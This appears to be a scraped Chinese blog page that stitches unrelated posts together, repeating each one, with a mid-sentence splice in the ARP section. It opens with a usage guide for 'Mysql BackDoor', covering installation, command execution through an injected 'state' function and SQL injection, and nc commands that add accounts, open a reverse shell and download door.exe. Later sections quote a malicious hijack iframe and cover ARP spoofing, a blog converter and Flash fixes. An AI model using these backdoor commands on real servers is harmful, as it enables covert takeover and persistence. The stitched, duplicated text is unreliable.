1
2010/05/01 
09:08 
290
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙安全.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
---------------权威资料看这里---------------
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
*******************************************
**** Bo-blog to WordPress 转换程序 v2.0
**** 本程序用于转换 Bo-blog 到 WordPress
**** 作者:yeyezai
**** 我的博客:http://www.yeyezai.com
**** TGB汉化工作室 http://www.cntgb.com
*******************************************
原帖地址:http://www.yeyezai.com/index.php?load=read&id=379###pp=0
最新版本下载地址(Bo-blog_to_WordPress.v2.0 build.20100310.zip):
http://down.qiannao.com/space/file/tgboffice/downloads/software/Bo-002dblog_to_WordPress.v2.0_build.20100310.zip/.page
原始程序:Bo-blog 2.1.0
目标程序:WordPress 2.6 - 2.9.2
程序说明:
本程序用于将 Bo-blog 2.1.0 转换到 WordPress 2.6 - 2.9.2。
支持转换 Bo-blog 日志、日志分类、链接、链接分类、评论、留言、附件、标签、用户等数据到 WordPress 数据。
使用说明:
1. 新安装 WordPress 到 Bo-blog 的同一数据库中。
2. 将 BoWP.php 复制到 Bo-blog 的安装目录下。
3. 在浏览器地址栏中输入 http://yoursite.com/Bo-blog/BoWP.php,其中 yoursite.com 为你的网站域名。
4. 转换设置
(1) 第一步,数据库设置
填写 Bo-blog 所在数据库的 服务器、数据库名称、数据库用户名、用户密码、Bo-blog 数据库前缀、WordPress 数据库前缀。
(2) 第二步,转接数据库
数据库连接不成功,请返回第一步检查所输入的设置
数据库连接成功,则根据个人需要选择要转换的数据,其中带*为有扩展选项
(3) 第三步,转换数据
此步不需要手动干涉,程序自动转换。
服务器的配置和设置不同,转换时所需时间也有所不同,请耐心等等转换结束。
扩展选项说明:
1. 博客网址 (可选)
功能:转换后的日志、附件、页面等链接为设置的网址
该功能主要针对在本地转换的朋友。默认情况下该网址为您的 WordPress 的地址。
注:地址后要加上反斜杆“/”。
2. 附件目录 (可选)
功能:转换日志中附件下载地址,转换附件表
如果您使用 Bo-blog 时没有使用过上传功能,即无附件,那么请无视此项。
若您使用了,请填写 WordPress 中存放 Bo-blog 附件文件夹的上一级目录,如:wp-content/bo/,其中 [wp-content] 为 WordPress 已存在的文件夹, [bo] 为新建文件夹。然后将 Bo-blog 安装目录下的 [attachment] 文件夹整体转移到 WordPress 安装目录下的 [wp-content]->[bo] 下即可。
注:地址后要加上反斜杆“/”。
**** Bo-blog to WordPress 转换程序 v2.0
**** 本程序用于转换 Bo-blog 到 WordPress
**** 作者:yeyezai
**** 我的博客:http://www.yeyezai.com
**** TGB汉化工作室 http://www.cntgb.com
*******************************************
原帖地址:http://www.yeyezai.com/index.php?load=read&id=379###pp=0
最新版本下载地址(Bo-blog_to_WordPress.v2.0 build.20100310.zip):
http://down.qiannao.com/space/file/tgboffice/downloads/software/Bo-002dblog_to_WordPress.v2.0_build.20100310.zip/.page
原始程序:Bo-blog 2.1.0
目标程序:WordPress 2.6 - 2.9.2
程序说明:
本程序用于将 Bo-blog 2.1.0 转换到 WordPress 2.6 - 2.9.2。
支持转换 Bo-blog 日志、日志分类、链接、链接分类、评论、留言、附件、标签、用户等数据到 WordPress 数据。
使用说明:
1. 新安装 WordPress 到 Bo-blog 的同一数据库中。
2. 将 BoWP.php 复制到 Bo-blog 的安装目录下。
3. 在浏览器地址栏中输入 http://yoursite.com/Bo-blog/BoWP.php,其中 yoursite.com 为你的网站域名。
4. 转换设置
(1) 第一步,数据库设置
填写 Bo-blog 所在数据库的 服务器、数据库名称、数据库用户名、用户密码、Bo-blog 数据库前缀、WordPress 数据库前缀。
(2) 第二步,转接数据库
数据库连接不成功,请返回第一步检查所输入的设置
数据库连接成功,则根据个人需要选择要转换的数据,其中带*为有扩展选项
(3) 第三步,转换数据
此步不需要手动干涉,程序自动转换。
服务器的配置和设置不同,转换时所需时间也有所不同,请耐心等等转换结束。
扩展选项说明:
1. 博客网址 (可选)
功能:转换后的日志、附件、页面等链接为设置的网址
该功能主要针对在本地转换的朋友。默认情况下该网址为您的 WordPress 的地址。
注:地址后要加上反斜杆“/”。
2. 附件目录 (可选)
功能:转换日志中附件下载地址,转换附件表
如果您使用 Bo-blog 时没有使用过上传功能,即无附件,那么请无视此项。
若您使用了,请填写 WordPress 中存放 Bo-blog 附件文件夹的上一级目录,如:wp-content/bo/,其中 [wp-content] 为 WordPress 已存在的文件夹, [bo] 为新建文件夹。然后将 Bo-blog 安装目录下的 [attachment] 文件夹整体转移到 WordPress 安装目录下的 [wp-content]->[bo] 下即可。
注:地址后要加上反斜杆“/”。
Symbian和WindowsMobile智能手机,你选择谁?(一)
话说淘宝上有一段搞笑对白,也不知是真有其事还是网友恶搞的:
买家:哥哥,你给我说说智能手机和非智能手机有什么区别啊!
卖家:就以闹钟为例,一般的手机到点就闹,闹得醒闹不醒不管,智能手机见闹不醒你,会打电话给你们单位领导请假。
买家:哦!
玩笑归玩笑,智能手机可不是真像上面说的那么“智能”。其实智能手机说白了就是一个拥有开放式操作系统的手机,类似于电脑中的Windows系统,你可以往里面安装不同的软件,实现不同的功能。有人也许会说,我的手机不是智能手机,为什么也可以安装QQ?那是因为现在的手机,几乎都支持Java程序。广泛的说,Java程序也算是第三方软件,但是仅支持java程序的手机所拥有的软件数量和智能手机平台的软件数量是绝不在一个级别的。况且有些涉及到硬件底层的功能,java程序是不能实现的。所以像QQ这种软件,既有支持各个智能手机操作系统的版本,也有Java版本。而有些比较底层的功能,例如输入法,就不是Java程序能实现的了。你见过哪个非智能手机有第三方输入法么?
现在智能手机的系统比较繁多,以前有Symbian(以诺基亚为龙头)、WindowsMobile(以多普达为龙头)、Linux(常见于MOTO的A系列手机)以及Palm OS(PALM手机的专利),后来又出现了苹果iphone所用的Mac OS系统、黑莓手机的BlackBerry系统,还有Google的Android系统,真可谓是热闹非凡。但是目前使用用户最多的,恐怕还是Symbian和WindowsMobile两大阵营。
话说淘宝上有一段搞笑对白,也不知是真有其事还是网友恶搞的:
买家:哥哥,你给我说说智能手机和非智能手机有什么区别啊!
卖家:就以闹钟为例,一般的手机到点就闹,闹得醒闹不醒不管,智能手机见闹不醒你,会打电话给你们单位领导请假。
买家:哦!
玩笑归玩笑,智能手机可不是真像上面说的那么“智能”。其实智能手机说白了就是一个拥有开放式操作系统的手机,类似于电脑中的Windows系统,你可以往里面安装不同的软件,实现不同的功能。有人也许会说,我的手机不是智能手机,为什么也可以安装QQ?那是因为现在的手机,几乎都支持Java程序。广泛的说,Java程序也算是第三方软件,但是仅支持java程序的手机所拥有的软件数量和智能手机平台的软件数量是绝不在一个级别的。况且有些涉及到硬件底层的功能,java程序是不能实现的。所以像QQ这种软件,既有支持各个智能手机操作系统的版本,也有Java版本。而有些比较底层的功能,例如输入法,就不是Java程序能实现的了。你见过哪个非智能手机有第三方输入法么?
现在智能手机的系统比较繁多,以前有Symbian(以诺基亚为龙头)、WindowsMobile(以多普达为龙头)、Linux(常见于MOTO的A系列手机)以及Palm OS(PALM手机的专利),后来又出现了苹果iphone所用的Mac OS系统、黑莓手机的BlackBerry系统,还有Google的Android系统,真可谓是热闹非凡。但是目前使用用户最多的,恐怕还是Symbian和WindowsMobile两大阵营。
有好几种方法供参考,本人用方法1搞定问题~~~
1.在使用浏览器浏览网页时我们经常会碰到:不支持flash。
分析原因,应该是flash组件未安装的问题,但通过添加/删除程序查看,确信已经安装了flash组件,并且是最高版本。
其实这并不是浏览器的问题,也不是电脑本身的问题,问题出在flash上,方法是:开始-运行-在输入框里输入“regsvr32 jscript.dll”点“确定”出现成功提示后点OK,同样方法运行“regsvr32 vbscript.dll”。好了!你可以试试!网页能显示flash啦,QQ空间也能进啦!
2.先打开C:\WINDOWS\system32\Macromed\Flash 把里面一个带X红色的uninstall_activeX文件卸载,这时打开QQ对话框有提示安装,如果安装不了,到http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash安装即可!
http://www.adobe.com/shockwave/download/flash/trigger/en/3/index.html
3,先把你的IE选项统统设为默认
或者:单击IE主窗口中的菜单“工具→Internet选项”,在打开的窗口中选择“高级”选项卡,在下面的列表中找到“多媒体→播放网页中的动画”选项并将其选中
在internet 选项—安全—自定义级别里要把运行activeX控件和插件,选为启用
4.开始 运行 输入regedit 回车进入注册表 找到
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility]
将其下面的{D27CDB6E-AE6D-11CF-96B8-444553540000}项或{D3f97240-C9f4-11CF-BFCr-00A0C90-00A0C90C2BDB}项的主键删除后关闭注册表 按键盘F5刷新后再安装FLASH插件
1.在使用浏览器浏览网页时我们经常会碰到:不支持flash。
分析原因,应该是flash组件未安装的问题,但通过添加/删除程序查看,确信已经安装了flash组件,并且是最高版本。
其实这并不是浏览器的问题,也不是电脑本身的问题,问题出在flash上,方法是:开始-运行-在输入框里输入“regsvr32 jscript.dll”点“确定”出现成功提示后点OK,同样方法运行“regsvr32 vbscript.dll”。好了!你可以试试!网页能显示flash啦,QQ空间也能进啦!
2.先打开C:\WINDOWS\system32\Macromed\Flash 把里面一个带X红色的uninstall_activeX文件卸载,这时打开QQ对话框有提示安装,如果安装不了,到http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash安装即可!
http://www.adobe.com/shockwave/download/flash/trigger/en/3/index.html
3,先把你的IE选项统统设为默认
或者:单击IE主窗口中的菜单“工具→Internet选项”,在打开的窗口中选择“高级”选项卡,在下面的列表中找到“多媒体→播放网页中的动画”选项并将其选中
在internet 选项—安全—自定义级别里要把运行activeX控件和插件,选为启用
4.开始 运行 输入regedit 回车进入注册表 找到
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility]
将其下面的{D27CDB6E-AE6D-11CF-96B8-444553540000}项或{D3f97240-C9f4-11CF-BFCr-00A0C90-00A0C90C2BDB}项的主键删除后关闭注册表 按键盘F5刷新后再安装FLASH插件
